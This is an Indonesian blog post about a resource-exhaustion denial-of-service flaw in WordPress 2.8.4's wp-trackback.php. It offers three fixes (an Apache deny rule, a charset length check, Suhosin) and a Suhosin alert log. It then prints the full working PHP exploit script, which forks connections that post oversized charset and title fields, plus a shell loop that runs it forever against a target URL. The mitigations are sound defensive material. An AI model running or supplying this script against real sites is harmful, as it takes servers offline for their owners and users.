Kabar yang saya dapat dari tred ini bahwa telah ditemukan exploit pada wordpres 2.8.4. Exploit ini sifatnya DOS (Denial Of Service) yaitu dengan melakukan pengiriman paket data secara terus menerus sehingga mengakibatkan sever kelebihan beban. Exploit ini memanfaatkan kelemahan wp-trackbacks.php.
Solusi
–solusi 1 terbuburuk–
tambahkan rules di konfigurasi apache (httpd.conf) baris berikut
<Files ~ "wp-trackback.php">
Order allow,deny
Deny from all
</Files>
–solusi 2 —
pada baris ke #47 wp-trackback.php tambahkan
if(strlen($charset) > 50)
die;
–solusi 3 —
silahkan install suhosin, karena dari hasil test suhosin kurang lebih terbukti bisa memblokir serangan tsb
berikut hasil log suhosin :
Oct 21 12:17:27 server suhosin[26063]: ALERT – configured request variable value length limit exceeded – dropped vari able ‘title’ (attacker ‘64.243.53.34’, file ‘/home/domainku/domains/domainku.com/public_html/wp-trackback.php’)
berikut script Eksploit
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 | <?php /* * wordpress Resource exhaustion Exploit * http://rooibo.wordpress.com/ * security@wordpress.org contacted and get a response, * but no solution available. * * [18/10/2009 20:31:00] modified by Zerial http://blog.zerial.org * * exploiting: * you must install php-cli (command line interface) * $ while /bin/true; do php wp-trackbacks_dos.php http://target.com/wordpress; done * */ if(count($argv) < 2) die("You need to specify a url to attackn"); $url = $argv[1]; $data = parse_url($url); if(count($data) < 2) die("The url should have http:// in front of it, and should be complete.n"); $path = (count($data)==2)?"":$data['path']; $path = trim($path,'/').'/wp-trackback.php'; if($path{0} != '/') $path = '/'.$path; $b = ""; $b = str_pad($b,140000,'ABCEDFG').utf8_encode($b); $charset = ""; $charset = str_pad($charset,140000,"UTF-8,"); $str = 'charset='.urlencode($charset); $str .= '&url=www.example.com'; $str .= '&title='.$b; $str .= '&blog_name=lol'; $str .= '&excerpt=lol'; for($n = 0; $n <= 5; $n++){ $fp = @fsockopen($data['host'],80); if(!$fp) die("unable to connect to: ".$data['host']."n"); $pid[$n] = pcntl_fork(); if(!$pid[$n]){ fputs($fp, "POST $path HTTP/1.1rn"); fputs($fp, "Host: ".$data['host']."rn"); fputs($fp, "Content-type: application/x-www-form-urlencodedrn"); fputs($fp, "Content-length: ".strlen($str)."rn"); fputs($fp, "Connection: closernrn"); fputs($fp, $str."rnrn"); echo "hit!n"; } } ?> |
Sumber :
http://www.diskusiwebhosting.com/showthread.php?t=1784
http://jarraltech.com/2009/10/new-0-day-wordpress-exploit/
terus berkarya mas hadi…
siap bos.